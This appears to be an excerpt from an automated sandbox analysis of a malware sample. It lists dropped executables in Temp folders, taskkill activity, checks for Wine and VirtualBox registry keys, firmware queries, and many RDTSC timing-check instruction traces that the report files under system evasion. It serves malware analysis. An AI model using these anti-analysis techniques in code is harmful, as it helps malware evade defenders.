Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38C9F5 second address: 38C9F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38BBCE second address: 38BBDE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F856102FBE6h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38BD00 second address: 38BD10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jl 00007F856106A856h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38BD10 second address: 38BD15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38BFF6 second address: 38BFFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38BFFA second address: 38C00C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EA42 second address: 20E9D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A868h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 10539002h 0x00000010 mov esi, dword ptr [ebp+122D36A0h] 0x00000016 push dword ptr [ebp+122D0931h] 0x0000001c push 00000000h 0x0000001e push edi 0x0000001f call 00007F856106A858h 0x00000024 pop edi 0x00000025 mov dword ptr [esp+04h], edi 0x00000029 add dword ptr [esp+04h], 0000001Dh 0x00000031 inc edi 0x00000032 push edi 0x00000033 ret 0x00000034 pop edi 0x00000035 ret 0x00000036 xor edi, 49785D2Fh 0x0000003c call dword ptr [ebp+122D3547h] 0x00000042 pushad 0x00000043 jc 00007F856106A862h 0x00000049 jg 00007F856106A85Ch 0x0000004f xor eax, eax 0x00000051 jnp 00007F856106A857h 0x00000057 cld 0x00000058 mov edx, dword ptr [esp+28h] 0x0000005c clc 0x0000005d mov dword ptr [ebp+122D36F8h], eax 0x00000063 mov dword ptr [ebp+122D1D2Ah], eax 0x00000069 mov esi, 0000003Ch 0x0000006e ja 00007F856106A857h 0x00000074 clc 0x00000075 add esi, dword ptr [esp+24h] 0x00000079 xor dword ptr [ebp+122D1D6Eh], ecx 0x0000007f lodsw 0x00000081 jmp 00007F856106A867h 0x00000086 add eax, dword ptr [esp+24h] 0x0000008a jmp 00007F856106A85Ah 0x0000008f mov ebx, dword ptr [esp+24h] 0x00000093 add dword ptr [ebp+122D1D2Ah], ecx 0x00000099 cmc 0x0000009a push eax 0x0000009b pushad 0x0000009c jl 00007F856106A85Ch 0x000000a2 push eax 0x000000a3 push edx 0x000000a4 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EAD0 second address: 38EAFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F856102FBEBh 0x0000000b nop 0x0000000c mov dl, D9h 0x0000000e push 00000000h 0x00000010 adc edi, 733641EAh 0x00000016 push 634714D7h 0x0000001b push eax 0x0000001c push edx 0x0000001d push edi 0x0000001e jnp 00007F856102FBE6h 0x00000024 pop edi 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EAFB second address: 38EB00 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EB00 second address: 38EB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xor dword ptr [esp], 63471457h 0x0000000e and edi, dword ptr [ebp+122D36DCh] 0x00000014 mov esi, dword ptr [ebp+122D3858h] 0x0000001a push 00000003h 0x0000001c movsx ecx, cx 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 mov cl, 3Ch 0x00000024 pop edi 0x00000025 push 00000003h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007F856102FBE8h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 0000001Bh 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 cmc 0x00000042 push 6072199Eh 0x00000047 push edi 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EB55 second address: 38EB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EB59 second address: 38EB88 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F856102FBE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b add dword ptr [esp], 5F8DE662h 0x00000012 jmp 00007F856102FBEAh 0x00000017 lea ebx, dword ptr [ebp+12453935h] 0x0000001d sub dword ptr [ebp+122D29BDh], edi 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 push ecx 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 pop ecx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EB88 second address: 38EBD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A861h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F856106A863h 0x00000011 jmp 00007F856106A85Bh 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F856106A863h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EEB7 second address: 38EED7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jc 00007F856102FBE6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F856102FBF1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 38EED7 second address: 38EEF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F856106A866h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 385B11 second address: 385B3D instructions: 0x00000000 rdtsc 0x00000002 js 00007F856102FBE6h 0x00000008 jg 00007F856102FBE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 jmp 00007F856102FBF9h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 385B3D second address: 385B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 js 00007F856106A856h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AE118 second address: 3AE11D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AE3EF second address: 3AE3F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AE857 second address: 3AE86E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBEDh 0x00000007 jng 00007F856102FBE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AEAEF second address: 3AEB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F856106A85Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F856106A856h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AEB09 second address: 3AEB0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AEC6E second address: 3AEC74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AEC74 second address: 3AEC7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AF1CE second address: 3AF1D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AF1D2 second address: 3AF1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AF1D8 second address: 3AF20C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F856106A85Ch 0x0000000c jmp 00007F856106A85Dh 0x00000011 popad 0x00000012 pushad 0x00000013 jmp 00007F856106A85Eh 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AF97D second address: 3AF983 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3AF983 second address: 3AF99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856106A867h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3B00C0 second address: 3B00C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3B00C4 second address: 3B00C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3B236E second address: 3B2390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F856102FBEEh 0x0000000b jmp 00007F856102FBECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3B4C36 second address: 3B4C3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3B540D second address: 3B5411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BCE41 second address: 3BCE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 380B18 second address: 380B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856102FBF2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 380B2E second address: 380B3B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 380B3B second address: 380B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 380B45 second address: 380B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push edx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 380B51 second address: 380B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BC394 second address: 3BC39A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BC7AF second address: 3BC7CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856102FBF4h 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BC7CA second address: 3BC7D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BC7D0 second address: 3BC7F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F856102FBF4h 0x0000000e je 00007F856102FBECh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BD4ED second address: 3BD4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BD4F5 second address: 3BD4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BD5FA second address: 3BD5FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BD5FE second address: 3BD604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BD604 second address: 3BD60A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BD60A second address: 3BD60E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BD60E second address: 3BD61F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BD61F second address: 3BD623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BDA85 second address: 3BDA8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BDA8E second address: 3BDA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE07B second address: 3BE07F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE0F7 second address: 3BE116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F856102FBF5h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE221 second address: 3BE227 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE227 second address: 3BE22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE22B second address: 3BE22F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE34F second address: 3BE36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F856102FBECh 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F856102FBE8h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE447 second address: 3BE44D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE44D second address: 3BE460 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F856102FBE6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BE571 second address: 3BE584 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856106A85Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BEC2A second address: 3BEC85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F856102FBF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F856102FBE8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov edi, 077BDF0Ch 0x0000002d push 00000000h 0x0000002f xchg eax, ebx 0x00000030 push ecx 0x00000031 push ebx 0x00000032 pushad 0x00000033 popad 0x00000034 pop ebx 0x00000035 pop ecx 0x00000036 push eax 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F856102FBEBh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BF6D0 second address: 3BF6DA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F856106A856h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BF6DA second address: 3BF6E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BF553 second address: 3BF557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BF6E0 second address: 3BF6E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BF557 second address: 3BF55B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 3BF6E4 second address: 3BF6E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
